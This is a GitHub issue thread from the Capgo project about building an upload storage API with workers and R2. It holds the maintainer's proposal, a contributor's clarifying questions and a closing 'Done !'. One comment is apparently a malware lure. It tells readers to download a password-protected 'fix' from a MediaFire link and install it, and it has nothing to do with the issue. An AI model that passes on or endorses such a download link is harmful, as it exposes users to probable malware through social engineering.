### ISSUE TITLE
Create Upload storage API 

### ISSUE THREAD

**Issue by riderx** [Cap-go/capgo#817]
The aim here is to create a new endpoint who allows any upload, zip multipart and partial update
This should not use presigned URL anymore and just direct upload with workers and R2, the URL should be randomized as we will make the bucket public with a Capgo URL.
As an alternative, we would do endpoint for download as well.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by WcaleNieWolny** [comment]
May I enquire what is the purpose of this and how do you intend to implement it?

> the URL should be randomized

Randomized how? 
What URL?

> we will make the bucket public with a Capgo URL

What will become public?

> direct upload with workers and R2

Only with workers and R2? 
Do you plan to use the R2 api directly? 
Do you plan to implement this endpoint for supabase?

**Comment by riderx** [comment]
Done !
